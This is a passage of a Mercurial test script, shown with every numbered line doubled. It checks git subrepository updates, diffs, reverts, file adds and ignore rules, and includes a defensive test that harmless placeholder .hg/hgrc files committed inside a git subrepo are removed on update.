514 subrepository s diverged (local revision: da5f5b1, remote revision: aa84837)
515 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
515 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
516 subrepository sources for s differ
516 subrepository sources for s differ
517 use (l)ocal source (da5f5b1) or (r)emote source (aa84837)? l
517 use (l)ocal source (da5f5b1) or (r)emote source (aa84837)? l
518 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
518 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
519 $ hg id -n
519 $ hg id -n
520 4+
520 4+
521 $ cd s
521 $ cd s
522 $ git rev-parse HEAD
522 $ git rev-parse HEAD
523 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
523 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
524 $ cd ..
524 $ cd ..
525 $ hg update --clean tip > /dev/null 2>&1
525 $ hg update --clean tip > /dev/null 2>&1
526
526
527 Sticky subrepository, revision updates
527 Sticky subrepository, revision updates
528 $ hg id -n
528 $ hg id -n
529 7
529 7
530 $ cd s
530 $ cd s
531 $ git rev-parse HEAD
531 $ git rev-parse HEAD
532 32a343883b74769118bb1d3b4b1fbf9156f4dddc
532 32a343883b74769118bb1d3b4b1fbf9156f4dddc
533 $ cd ..
533 $ cd ..
534 $ cd s
534 $ cd s
535 $ git checkout aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
535 $ git checkout aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
536 Previous HEAD position was 32a3438... fff
536 Previous HEAD position was 32a3438... fff
537 HEAD is now at aa84837... f
537 HEAD is now at aa84837... f
538 $ cd ..
538 $ cd ..
539 $ hg update 1
539 $ hg update 1
540 subrepository s diverged (local revision: 32a3438, remote revision: da5f5b1)
540 subrepository s diverged (local revision: 32a3438, remote revision: da5f5b1)
541 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
541 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
542 subrepository sources for s differ (in checked out version)
542 subrepository sources for s differ (in checked out version)
543 use (l)ocal source (32a3438) or (r)emote source (da5f5b1)? l
543 use (l)ocal source (32a3438) or (r)emote source (da5f5b1)? l
544 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
544 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
545 $ hg id -n
545 $ hg id -n
546 1+
546 1+
547 $ cd s
547 $ cd s
548 $ git rev-parse HEAD
548 $ git rev-parse HEAD
549 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
549 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
550 $ cd ..
550 $ cd ..
551
551
552 Sticky subrepository, file changes and revision updates
552 Sticky subrepository, file changes and revision updates
553 $ touch s/f1
553 $ touch s/f1
554 $ cd s
554 $ cd s
555 $ git add f1
555 $ git add f1
556 $ git rev-parse HEAD
556 $ git rev-parse HEAD
557 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
557 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
558 $ cd ..
558 $ cd ..
559 $ hg id -n
559 $ hg id -n
560 1+
560 1+
561 $ hg update 7
561 $ hg update 7
562 subrepository s diverged (local revision: 32a3438, remote revision: 32a3438)
562 subrepository s diverged (local revision: 32a3438, remote revision: 32a3438)
563 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
563 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
564 subrepository sources for s differ
564 subrepository sources for s differ
565 use (l)ocal source (32a3438) or (r)emote source (32a3438)? l
565 use (l)ocal source (32a3438) or (r)emote source (32a3438)? l
566 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
566 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
567 $ hg id -n
567 $ hg id -n
568 7+
568 7+
569 $ cd s
569 $ cd s
570 $ git rev-parse HEAD
570 $ git rev-parse HEAD
571 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
571 aa84837ccfbdfedcdcdeeedc309d73e6eb069edc
572 $ cd ..
572 $ cd ..
573
573
574 Sticky repository, update --clean
574 Sticky repository, update --clean
575 $ hg update --clean tip 2>/dev/null
575 $ hg update --clean tip 2>/dev/null
576 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
576 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
577 $ hg id -n
577 $ hg id -n
578 7
578 7
579 $ cd s
579 $ cd s
580 $ git rev-parse HEAD
580 $ git rev-parse HEAD
581 32a343883b74769118bb1d3b4b1fbf9156f4dddc
581 32a343883b74769118bb1d3b4b1fbf9156f4dddc
582 $ cd ..
582 $ cd ..
583
583
584 Test subrepo already at intended revision:
584 Test subrepo already at intended revision:
585 $ cd s
585 $ cd s
586 $ git checkout 32a343883b74769118bb1d3b4b1fbf9156f4dddc
586 $ git checkout 32a343883b74769118bb1d3b4b1fbf9156f4dddc
587 HEAD is now at 32a3438... fff
587 HEAD is now at 32a3438... fff
588 $ cd ..
588 $ cd ..
589 $ hg update 1
589 $ hg update 1
590 Previous HEAD position was 32a3438... fff
590 Previous HEAD position was 32a3438... fff
591 HEAD is now at da5f5b1... g
591 HEAD is now at da5f5b1... g
592 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
592 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
593 $ hg id -n
593 $ hg id -n
594 1
594 1
595 $ cd s
595 $ cd s
596 $ git rev-parse HEAD
596 $ git rev-parse HEAD
597 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
597 da5f5b1d8ffcf62fb8327bcd3c89a4367a6018e7
598 $ cd ..
598 $ cd ..
599
599
600 Test forgetting files, not implemented in git subrepo, used to
600 Test forgetting files, not implemented in git subrepo, used to
601 traceback
601 traceback
602 #if no-windows
602 #if no-windows
603 $ hg forget 'notafile*'
603 $ hg forget 'notafile*'
604 notafile*: No such file or directory
604 notafile*: No such file or directory
605 [1]
605 [1]
606 #else
606 #else
607 $ hg forget 'notafile'
607 $ hg forget 'notafile'
608 notafile: * (glob)
608 notafile: * (glob)
609 [1]
609 [1]
610 #endif
610 #endif
611
611
612 $ cd ..
612 $ cd ..
613
613
614 Test sanitizing ".hg/hgrc" in subrepo
614 Test sanitizing ".hg/hgrc" in subrepo
615
615
616 $ cd t
616 $ cd t
617 $ hg tip -q
617 $ hg tip -q
618 7:af6d2edbb0d3
618 7:af6d2edbb0d3
619 $ hg update -q -C af6d2edbb0d3
619 $ hg update -q -C af6d2edbb0d3
620 $ cd s
620 $ cd s
621 $ git checkout -q -b sanitize-test
621 $ git checkout -q -b sanitize-test
622 $ mkdir .hg
622 $ mkdir .hg
623 $ echo '.hg/hgrc in git repo' > .hg/hgrc
623 $ echo '.hg/hgrc in git repo' > .hg/hgrc
624 $ mkdir -p sub/.hg
624 $ mkdir -p sub/.hg
625 $ echo 'sub/.hg/hgrc in git repo' > sub/.hg/hgrc
625 $ echo 'sub/.hg/hgrc in git repo' > sub/.hg/hgrc
626 $ git add .hg sub
626 $ git add .hg sub
627 $ git commit -qm 'add .hg/hgrc to be sanitized at hg update'
627 $ git commit -qm 'add .hg/hgrc to be sanitized at hg update'
628 $ git push -q origin sanitize-test
628 $ git push -q origin sanitize-test
629 $ cd ..
629 $ cd ..
630 $ grep ' s$' .hgsubstate
630 $ grep ' s$' .hgsubstate
631 32a343883b74769118bb1d3b4b1fbf9156f4dddc s
631 32a343883b74769118bb1d3b4b1fbf9156f4dddc s
632 $ hg commit -qm 'commit with git revision including .hg/hgrc'
632 $ hg commit -qm 'commit with git revision including .hg/hgrc'
633 $ hg parents -q
633 $ hg parents -q
634 8:3473d20bddcf
634 8:3473d20bddcf
635 $ grep ' s$' .hgsubstate
635 $ grep ' s$' .hgsubstate
636 c4069473b459cf27fd4d7c2f50c4346b4e936599 s
636 c4069473b459cf27fd4d7c2f50c4346b4e936599 s
637 $ cd ..
637 $ cd ..
638
638
639 $ hg -R tc pull -q
639 $ hg -R tc pull -q
640 $ hg -R tc update -q -C 3473d20bddcf 2>&1 | sort
640 $ hg -R tc update -q -C 3473d20bddcf 2>&1 | sort
641 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/.hg' (glob)
641 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/.hg' (glob)
642 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/sub/.hg' (glob)
642 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/sub/.hg' (glob)
643 $ cd tc
643 $ cd tc
644 $ hg parents -q
644 $ hg parents -q
645 8:3473d20bddcf
645 8:3473d20bddcf
646 $ grep ' s$' .hgsubstate
646 $ grep ' s$' .hgsubstate
647 c4069473b459cf27fd4d7c2f50c4346b4e936599 s
647 c4069473b459cf27fd4d7c2f50c4346b4e936599 s
648 $ test -f s/.hg/hgrc
648 $ test -f s/.hg/hgrc
649 [1]
649 [1]
650 $ test -f s/sub/.hg/hgrc
650 $ test -f s/sub/.hg/hgrc
651 [1]
651 [1]
652 $ cd ..
652 $ cd ..
653
653
654 additional test for "git merge --ff" route:
654 additional test for "git merge --ff" route:
655
655
656 $ cd t
656 $ cd t
657 $ hg tip -q
657 $ hg tip -q
658 8:3473d20bddcf
658 8:3473d20bddcf
659 $ hg update -q -C af6d2edbb0d3
659 $ hg update -q -C af6d2edbb0d3
660 $ cd s
660 $ cd s
661 $ git checkout -q testing
661 $ git checkout -q testing
662 $ mkdir .hg
662 $ mkdir .hg
663 $ echo '.hg/hgrc in git repo' > .hg/hgrc
663 $ echo '.hg/hgrc in git repo' > .hg/hgrc
664 $ mkdir -p sub/.hg
664 $ mkdir -p sub/.hg
665 $ echo 'sub/.hg/hgrc in git repo' > sub/.hg/hgrc
665 $ echo 'sub/.hg/hgrc in git repo' > sub/.hg/hgrc
666 $ git add .hg sub
666 $ git add .hg sub
667 $ git commit -qm 'add .hg/hgrc to be sanitized at hg update (git merge --ff)'
667 $ git commit -qm 'add .hg/hgrc to be sanitized at hg update (git merge --ff)'
668 $ git push -q origin testing
668 $ git push -q origin testing
669 $ cd ..
669 $ cd ..
670 $ grep ' s$' .hgsubstate
670 $ grep ' s$' .hgsubstate
671 32a343883b74769118bb1d3b4b1fbf9156f4dddc s
671 32a343883b74769118bb1d3b4b1fbf9156f4dddc s
672 $ hg commit -qm 'commit with git revision including .hg/hgrc'
672 $ hg commit -qm 'commit with git revision including .hg/hgrc'
673 $ hg parents -q
673 $ hg parents -q
674 9:ed23f7fe024e
674 9:ed23f7fe024e
675 $ grep ' s$' .hgsubstate
675 $ grep ' s$' .hgsubstate
676 f262643c1077219fbd3858d54e78ef050ef84fbf s
676 f262643c1077219fbd3858d54e78ef050ef84fbf s
677 $ cd ..
677 $ cd ..
678
678
679 $ cd tc
679 $ cd tc
680 $ hg update -q -C af6d2edbb0d3
680 $ hg update -q -C af6d2edbb0d3
681 $ test -f s/.hg/hgrc
681 $ test -f s/.hg/hgrc
682 [1]
682 [1]
683 $ test -f s/sub/.hg/hgrc
683 $ test -f s/sub/.hg/hgrc
684 [1]
684 [1]
685 $ cd ..
685 $ cd ..
686 $ hg -R tc pull -q
686 $ hg -R tc pull -q
687 $ hg -R tc update -q -C ed23f7fe024e 2>&1 | sort
687 $ hg -R tc update -q -C ed23f7fe024e 2>&1 | sort
688 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/.hg' (glob)
688 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/.hg' (glob)
689 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/sub/.hg' (glob)
689 warning: removing potentially hostile 'hgrc' in '$TESTTMP/tc/s/sub/.hg' (glob)
690 $ cd tc
690 $ cd tc
691 $ hg parents -q
691 $ hg parents -q
692 9:ed23f7fe024e
692 9:ed23f7fe024e
693 $ grep ' s$' .hgsubstate
693 $ grep ' s$' .hgsubstate
694 f262643c1077219fbd3858d54e78ef050ef84fbf s
694 f262643c1077219fbd3858d54e78ef050ef84fbf s
695 $ test -f s/.hg/hgrc
695 $ test -f s/.hg/hgrc
696 [1]
696 [1]
697 $ test -f s/sub/.hg/hgrc
697 $ test -f s/sub/.hg/hgrc
698 [1]
698 [1]
699
699
700 Test that sanitizing is omitted in meta data area:
700 Test that sanitizing is omitted in meta data area:
701
701
702 $ mkdir s/.git/.hg
702 $ mkdir s/.git/.hg
703 $ echo '.hg/hgrc in git metadata area' > s/.git/.hg/hgrc
703 $ echo '.hg/hgrc in git metadata area' > s/.git/.hg/hgrc
704 $ hg update -q -C af6d2edbb0d3
704 $ hg update -q -C af6d2edbb0d3
705 checking out detached HEAD in subrepository "s"
705 checking out detached HEAD in subrepository "s"
706 check out a git branch if you intend to make changes
706 check out a git branch if you intend to make changes
707
707
708 check differences made by most recent change
708 check differences made by most recent change
709 $ cd s
709 $ cd s
710 $ cat > foobar << EOF
710 $ cat > foobar << EOF
711 > woopwoop
711 > woopwoop
712 >
712 >
713 > foo
713 > foo
714 > bar
714 > bar
715 > EOF
715 > EOF
716 $ git add foobar
716 $ git add foobar
717 $ cd ..
717 $ cd ..
718
718
719 $ hg diff --subrepos
719 $ hg diff --subrepos
720 diff --git a/s/foobar b/s/foobar
720 diff --git a/s/foobar b/s/foobar
721 new file mode 100644
721 new file mode 100644
722 index 0000000..8a5a5e2
722 index 0000000..8a5a5e2
723 --- /dev/null
723 --- /dev/null
724 +++ b/s/foobar
724 +++ b/s/foobar
725 @@ -0,0 +1,4 @@
725 @@ -0,0 +1,4 @@
726 +woopwoop
726 +woopwoop
727 +
727 +
728 +foo
728 +foo
729 +bar
729 +bar
730
730
731 $ hg commit --subrepos -m "Added foobar"
731 $ hg commit --subrepos -m "Added foobar"
732 committing subrepository s
732 committing subrepository s
733 created new head
733 created new head
734
734
735 $ hg diff -c . --subrepos --nodates
735 $ hg diff -c . --subrepos --nodates
736 diff -r af6d2edbb0d3 -r 255ee8cf690e .hgsubstate
736 diff -r af6d2edbb0d3 -r 255ee8cf690e .hgsubstate
737 --- a/.hgsubstate
737 --- a/.hgsubstate
738 +++ b/.hgsubstate
738 +++ b/.hgsubstate
739 @@ -1,1 +1,1 @@
739 @@ -1,1 +1,1 @@
740 -32a343883b74769118bb1d3b4b1fbf9156f4dddc s
740 -32a343883b74769118bb1d3b4b1fbf9156f4dddc s
741 +fd4dbf828a5b2fcd36b2bcf21ea773820970d129 s
741 +fd4dbf828a5b2fcd36b2bcf21ea773820970d129 s
742 diff --git a/s/foobar b/s/foobar
742 diff --git a/s/foobar b/s/foobar
743 new file mode 100644
743 new file mode 100644
744 index 0000000..8a5a5e2
744 index 0000000..8a5a5e2
745 --- /dev/null
745 --- /dev/null
746 +++ b/s/foobar
746 +++ b/s/foobar
747 @@ -0,0 +1,4 @@
747 @@ -0,0 +1,4 @@
748 +woopwoop
748 +woopwoop
749 +
749 +
750 +foo
750 +foo
751 +bar
751 +bar
752
752
753 check output when only diffing the subrepository
753 check output when only diffing the subrepository
754 $ hg diff -c . --subrepos s
754 $ hg diff -c . --subrepos s
755 diff --git a/s/foobar b/s/foobar
755 diff --git a/s/foobar b/s/foobar
756 new file mode 100644
756 new file mode 100644
757 index 0000000..8a5a5e2
757 index 0000000..8a5a5e2
758 --- /dev/null
758 --- /dev/null
759 +++ b/s/foobar
759 +++ b/s/foobar
760 @@ -0,0 +1,4 @@
760 @@ -0,0 +1,4 @@
761 +woopwoop
761 +woopwoop
762 +
762 +
763 +foo
763 +foo
764 +bar
764 +bar
765
765
766 check output when diffing something else
766 check output when diffing something else
767 $ hg diff -c . --subrepos .hgsubstate --nodates
767 $ hg diff -c . --subrepos .hgsubstate --nodates
768 diff -r af6d2edbb0d3 -r 255ee8cf690e .hgsubstate
768 diff -r af6d2edbb0d3 -r 255ee8cf690e .hgsubstate
769 --- a/.hgsubstate
769 --- a/.hgsubstate
770 +++ b/.hgsubstate
770 +++ b/.hgsubstate
771 @@ -1,1 +1,1 @@
771 @@ -1,1 +1,1 @@
772 -32a343883b74769118bb1d3b4b1fbf9156f4dddc s
772 -32a343883b74769118bb1d3b4b1fbf9156f4dddc s
773 +fd4dbf828a5b2fcd36b2bcf21ea773820970d129 s
773 +fd4dbf828a5b2fcd36b2bcf21ea773820970d129 s
774
774
775 add new changes, including whitespace
775 add new changes, including whitespace
776 $ cd s
776 $ cd s
777 $ cat > foobar << EOF
777 $ cat > foobar << EOF
778 > woop woop
778 > woop woop
779 >
779 >
780 > foo
780 > foo
781 > bar
781 > bar
782 > EOF
782 > EOF
783 $ echo foo > barfoo
783 $ echo foo > barfoo
784 $ git add barfoo
784 $ git add barfoo
785 $ cd ..
785 $ cd ..
786
786
787 $ hg diff --subrepos --ignore-all-space
787 $ hg diff --subrepos --ignore-all-space
788 diff --git a/s/barfoo b/s/barfoo
788 diff --git a/s/barfoo b/s/barfoo
789 new file mode 100644
789 new file mode 100644
790 index 0000000..257cc56
790 index 0000000..257cc56
791 --- /dev/null
791 --- /dev/null
792 +++ b/s/barfoo
792 +++ b/s/barfoo
793 @@ -0,0 +1* @@ (glob)
793 @@ -0,0 +1* @@ (glob)
794 +foo
794 +foo
795 $ hg diff --subrepos s/foobar
795 $ hg diff --subrepos s/foobar
796 diff --git a/s/foobar b/s/foobar
796 diff --git a/s/foobar b/s/foobar
797 index 8a5a5e2..bd5812a 100644
797 index 8a5a5e2..bd5812a 100644
798 --- a/s/foobar
798 --- a/s/foobar
799 +++ b/s/foobar
799 +++ b/s/foobar
800 @@ -1,4 +1,4 @@
800 @@ -1,4 +1,4 @@
801 -woopwoop
801 -woopwoop
802 +woop woop
802 +woop woop
803
803
804 foo
804 foo
805 bar
805 bar
806
806
807 execute a diffstat
807 execute a diffstat
808 the output contains a regex, because git 1.7.10 and 1.7.11
808 the output contains a regex, because git 1.7.10 and 1.7.11
809 change the amount of whitespace
809 change the amount of whitespace
810 $ hg diff --subrepos --stat
810 $ hg diff --subrepos --stat
811 \s*barfoo |\s*1 + (re)
811 \s*barfoo |\s*1 + (re)
812 \s*foobar |\s*2 +- (re)
812 \s*foobar |\s*2 +- (re)
813 2 files changed, 2 insertions\(\+\), 1 deletions?\(-\) (re)
813 2 files changed, 2 insertions\(\+\), 1 deletions?\(-\) (re)
814
814
815 adding an include should ignore the other elements
815 adding an include should ignore the other elements
816 $ hg diff --subrepos -I s/foobar
816 $ hg diff --subrepos -I s/foobar
817 diff --git a/s/foobar b/s/foobar
817 diff --git a/s/foobar b/s/foobar
818 index 8a5a5e2..bd5812a 100644
818 index 8a5a5e2..bd5812a 100644
819 --- a/s/foobar
819 --- a/s/foobar
820 +++ b/s/foobar
820 +++ b/s/foobar
821 @@ -1,4 +1,4 @@
821 @@ -1,4 +1,4 @@
822 -woopwoop
822 -woopwoop
823 +woop woop
823 +woop woop
824
824
825 foo
825 foo
826 bar
826 bar
827
827
828 adding an exclude should ignore this element
828 adding an exclude should ignore this element
829 $ hg diff --subrepos -X s/foobar
829 $ hg diff --subrepos -X s/foobar
830 diff --git a/s/barfoo b/s/barfoo
830 diff --git a/s/barfoo b/s/barfoo
831 new file mode 100644
831 new file mode 100644
832 index 0000000..257cc56
832 index 0000000..257cc56
833 --- /dev/null
833 --- /dev/null
834 +++ b/s/barfoo
834 +++ b/s/barfoo
835 @@ -0,0 +1* @@ (glob)
835 @@ -0,0 +1* @@ (glob)
836 +foo
836 +foo
837
837
838 moving a file should show a removal and an add
838 moving a file should show a removal and an add
839 $ hg revert --all
839 $ hg revert --all
840 reverting subrepo ../gitroot
840 reverting subrepo ../gitroot
841 $ cd s
841 $ cd s
842 $ git mv foobar woop
842 $ git mv foobar woop
843 $ cd ..
843 $ cd ..
844 $ hg diff --subrepos
844 $ hg diff --subrepos
845 diff --git a/s/foobar b/s/foobar
845 diff --git a/s/foobar b/s/foobar
846 deleted file mode 100644
846 deleted file mode 100644
847 index 8a5a5e2..0000000
847 index 8a5a5e2..0000000
848 --- a/s/foobar
848 --- a/s/foobar
849 +++ /dev/null
849 +++ /dev/null
850 @@ -1,4 +0,0 @@
850 @@ -1,4 +0,0 @@
851 -woopwoop
851 -woopwoop
852 -
852 -
853 -foo
853 -foo
854 -bar
854 -bar
855 diff --git a/s/woop b/s/woop
855 diff --git a/s/woop b/s/woop
856 new file mode 100644
856 new file mode 100644
857 index 0000000..8a5a5e2
857 index 0000000..8a5a5e2
858 --- /dev/null
858 --- /dev/null
859 +++ b/s/woop
859 +++ b/s/woop
860 @@ -0,0 +1,4 @@
860 @@ -0,0 +1,4 @@
861 +woopwoop
861 +woopwoop
862 +
862 +
863 +foo
863 +foo
864 +bar
864 +bar
865 $ rm s/woop
865 $ rm s/woop
866
866
867 revert the subrepository
867 revert the subrepository
868 $ hg revert --all
868 $ hg revert --all
869 reverting subrepo ../gitroot
869 reverting subrepo ../gitroot
870
870
871 $ hg status --subrepos
871 $ hg status --subrepos
872 ? s/barfoo
872 ? s/barfoo
873 ? s/foobar.orig
873 ? s/foobar.orig
874
874
875 $ mv s/foobar.orig s/foobar
875 $ mv s/foobar.orig s/foobar
876
876
877 $ hg revert --no-backup s
877 $ hg revert --no-backup s
878 reverting subrepo ../gitroot
878 reverting subrepo ../gitroot
879
879
880 $ hg status --subrepos
880 $ hg status --subrepos
881 ? s/barfoo
881 ? s/barfoo
882
882
883 revert moves orig files to the right place
883 revert moves orig files to the right place
884 $ echo 'bloop' > s/foobar
884 $ echo 'bloop' > s/foobar
885 $ hg revert --all --verbose --config 'ui.origbackuppath=.hg/origbackups'
885 $ hg revert --all --verbose --config 'ui.origbackuppath=.hg/origbackups'
886 reverting subrepo ../gitroot
886 reverting subrepo ../gitroot
887 creating directory: $TESTTMP/tc/.hg/origbackups (glob)
887 creating directory: $TESTTMP/tc/.hg/origbackups (glob)
888 saving current version of foobar as $TESTTMP/tc/.hg/origbackups/foobar.orig (glob)
888 saving current version of foobar as $TESTTMP/tc/.hg/origbackups/foobar.orig (glob)
889 $ ls .hg/origbackups
889 $ ls .hg/origbackups
890 foobar.orig
890 foobar.orig
891 $ rm -rf .hg/origbackups
891 $ rm -rf .hg/origbackups
892
892
893 show file at specific revision
893 show file at specific revision
894 $ cat > s/foobar << EOF
894 $ cat > s/foobar << EOF
895 > woop woop
895 > woop woop
896 > fooo bar
896 > fooo bar
897 > EOF
897 > EOF
898 $ hg commit --subrepos -m "updated foobar"
898 $ hg commit --subrepos -m "updated foobar"
899 committing subrepository s
899 committing subrepository s
900 $ cat > s/foobar << EOF
900 $ cat > s/foobar << EOF
901 > current foobar
901 > current foobar
902 > (should not be visible using hg cat)
902 > (should not be visible using hg cat)
903 > EOF
903 > EOF
904
904
905 $ hg cat -r . s/foobar
905 $ hg cat -r . s/foobar
906 woop woop
906 woop woop
907 fooo bar (no-eol)
907 fooo bar (no-eol)
908 $ hg cat -r "parents(.)" s/foobar > catparents
908 $ hg cat -r "parents(.)" s/foobar > catparents
909
909
910 $ mkdir -p tmp/s
910 $ mkdir -p tmp/s
911
911
912 $ hg cat -r "parents(.)" --output tmp/%% s/foobar
912 $ hg cat -r "parents(.)" --output tmp/%% s/foobar
913 $ diff tmp/% catparents
913 $ diff tmp/% catparents
914
914
915 $ hg cat -r "parents(.)" --output tmp/%s s/foobar
915 $ hg cat -r "parents(.)" --output tmp/%s s/foobar
916 $ diff tmp/foobar catparents
916 $ diff tmp/foobar catparents
917
917
918 $ hg cat -r "parents(.)" --output tmp/%d/otherfoobar s/foobar
918 $ hg cat -r "parents(.)" --output tmp/%d/otherfoobar s/foobar
919 $ diff tmp/s/otherfoobar catparents
919 $ diff tmp/s/otherfoobar catparents
920
920
921 $ hg cat -r "parents(.)" --output tmp/%p s/foobar
921 $ hg cat -r "parents(.)" --output tmp/%p s/foobar
922 $ diff tmp/s/foobar catparents
922 $ diff tmp/s/foobar catparents
923
923
924 $ hg cat -r "parents(.)" --output tmp/%H s/foobar
924 $ hg cat -r "parents(.)" --output tmp/%H s/foobar
925 $ diff tmp/255ee8cf690ec86e99b1e80147ea93ece117cd9d catparents
925 $ diff tmp/255ee8cf690ec86e99b1e80147ea93ece117cd9d catparents
926
926
927 $ hg cat -r "parents(.)" --output tmp/%R s/foobar
927 $ hg cat -r "parents(.)" --output tmp/%R s/foobar
928 $ diff tmp/10 catparents
928 $ diff tmp/10 catparents
929
929
930 $ hg cat -r "parents(.)" --output tmp/%h s/foobar
930 $ hg cat -r "parents(.)" --output tmp/%h s/foobar
931 $ diff tmp/255ee8cf690e catparents
931 $ diff tmp/255ee8cf690e catparents
932
932
933 $ rm tmp/10
933 $ rm tmp/10
934 $ hg cat -r "parents(.)" --output tmp/%r s/foobar
934 $ hg cat -r "parents(.)" --output tmp/%r s/foobar
935 $ diff tmp/10 catparents
935 $ diff tmp/10 catparents
936
936
937 $ mkdir tmp/tc
937 $ mkdir tmp/tc
938 $ hg cat -r "parents(.)" --output tmp/%b/foobar s/foobar
938 $ hg cat -r "parents(.)" --output tmp/%b/foobar s/foobar
939 $ diff tmp/tc/foobar catparents
939 $ diff tmp/tc/foobar catparents
940
940
941 cleanup
941 cleanup
942 $ rm -r tmp
942 $ rm -r tmp
943 $ rm catparents
943 $ rm catparents
944
944
945 add git files, using either files or patterns
945 add git files, using either files or patterns
946 $ echo "hsss! hsssssssh!" > s/snake.python
946 $ echo "hsss! hsssssssh!" > s/snake.python
947 $ echo "ccc" > s/c.c
947 $ echo "ccc" > s/c.c
948 $ echo "cpp" > s/cpp.cpp
948 $ echo "cpp" > s/cpp.cpp
949
949
950 $ hg add s/snake.python s/c.c s/cpp.cpp
950 $ hg add s/snake.python s/c.c s/cpp.cpp
951 $ hg st --subrepos s
951 $ hg st --subrepos s
952 M s/foobar
952 M s/foobar
953 A s/c.c
953 A s/c.c
954 A s/cpp.cpp
954 A s/cpp.cpp
955 A s/snake.python
955 A s/snake.python
956 ? s/barfoo
956 ? s/barfoo
957 $ hg revert s
957 $ hg revert s
958 reverting subrepo ../gitroot
958 reverting subrepo ../gitroot
959
959
960 $ hg add --subrepos "glob:**.python"
960 $ hg add --subrepos "glob:**.python"
961 adding s/snake.python (glob)
961 adding s/snake.python (glob)
962 $ hg st --subrepos s
962 $ hg st --subrepos s
963 A s/snake.python
963 A s/snake.python
964 ? s/barfoo
964 ? s/barfoo
965 ? s/c.c
965 ? s/c.c
966 ? s/cpp.cpp
966 ? s/cpp.cpp
967 ? s/foobar.orig
967 ? s/foobar.orig
968 $ hg revert s
968 $ hg revert s
969 reverting subrepo ../gitroot
969 reverting subrepo ../gitroot
970
970
971 $ hg add --subrepos s
971 $ hg add --subrepos s
972 adding s/barfoo (glob)
972 adding s/barfoo (glob)
973 adding s/c.c (glob)
973 adding s/c.c (glob)
974 adding s/cpp.cpp (glob)
974 adding s/cpp.cpp (glob)
975 adding s/foobar.orig (glob)
975 adding s/foobar.orig (glob)
976 adding s/snake.python (glob)
976 adding s/snake.python (glob)
977 $ hg st --subrepos s
977 $ hg st --subrepos s
978 A s/barfoo
978 A s/barfoo
979 A s/c.c
979 A s/c.c
980 A s/cpp.cpp
980 A s/cpp.cpp
981 A s/foobar.orig
981 A s/foobar.orig
982 A s/snake.python
982 A s/snake.python
983 $ hg revert s
983 $ hg revert s
984 reverting subrepo ../gitroot
984 reverting subrepo ../gitroot
985 make sure everything is reverted correctly
985 make sure everything is reverted correctly
986 $ hg st --subrepos s
986 $ hg st --subrepos s
987 ? s/barfoo
987 ? s/barfoo
988 ? s/c.c
988 ? s/c.c
989 ? s/cpp.cpp
989 ? s/cpp.cpp
990 ? s/foobar.orig
990 ? s/foobar.orig
991 ? s/snake.python
991 ? s/snake.python
992
992
993 $ hg add --subrepos --exclude "path:s/c.c"
993 $ hg add --subrepos --exclude "path:s/c.c"
994 adding s/barfoo (glob)
994 adding s/barfoo (glob)
995 adding s/cpp.cpp (glob)
995 adding s/cpp.cpp (glob)
996 adding s/foobar.orig (glob)
996 adding s/foobar.orig (glob)
997 adding s/snake.python (glob)
997 adding s/snake.python (glob)
998 $ hg st --subrepos s
998 $ hg st --subrepos s
999 A s/barfoo
999 A s/barfoo
1000 A s/cpp.cpp
1000 A s/cpp.cpp
1001 A s/foobar.orig
1001 A s/foobar.orig
1002 A s/snake.python
1002 A s/snake.python
1003 ? s/c.c
1003 ? s/c.c
1004 $ hg revert --all -q
1004 $ hg revert --all -q
1005
1005
1006 .hgignore should not have influence in subrepos
1006 .hgignore should not have influence in subrepos
1007 $ cat > .hgignore << EOF
1007 $ cat > .hgignore << EOF
1008 > syntax: glob
1008 > syntax: glob
1009 > *.python
1009 > *.python
1010 > EOF
1010 > EOF
1011 $ hg add .hgignore
1011 $ hg add .hgignore
1012 $ hg add --subrepos "glob:**.python" s/barfoo
1012 $ hg add --subrepos "glob:**.python" s/barfoo
1013 adding s/snake.python (glob)
1013 adding s/snake.python (glob)
1014 $ hg st --subrepos s
1014 $ hg st --subrepos s
1015 A s/barfoo
1015 A s/barfoo
1016 A s/snake.python
1016 A s/snake.python
1017 ? s/c.c
1017 ? s/c.c
1018 ? s/cpp.cpp
1018 ? s/cpp.cpp
1019 ? s/foobar.orig
1019 ? s/foobar.orig
1020 $ hg revert --all -q
1020 $ hg revert --all -q
1021
1021
1022 .gitignore should have influence,
1022 .gitignore should have influence,
1023 except for explicitly added files (no patterns)
1023 except for explicitly added files (no patterns)
1024 $ cat > s/.gitignore << EOF
1024 $ cat > s/.gitignore << EOF
1025 > *.python
1025 > *.python
1026 > EOF
1026 > EOF
1027 $ hg add s/.gitignore
1027 $ hg add s/.gitignore
1028 $ hg st --subrepos s
1028 $ hg st --subrepos s
1029 A s/.gitignore
1029 A s/.gitignore
1030 ? s/barfoo
1030 ? s/barfoo
1031 ? s/c.c
1031 ? s/c.c
1032 ? s/cpp.cpp
1032 ? s/cpp.cpp
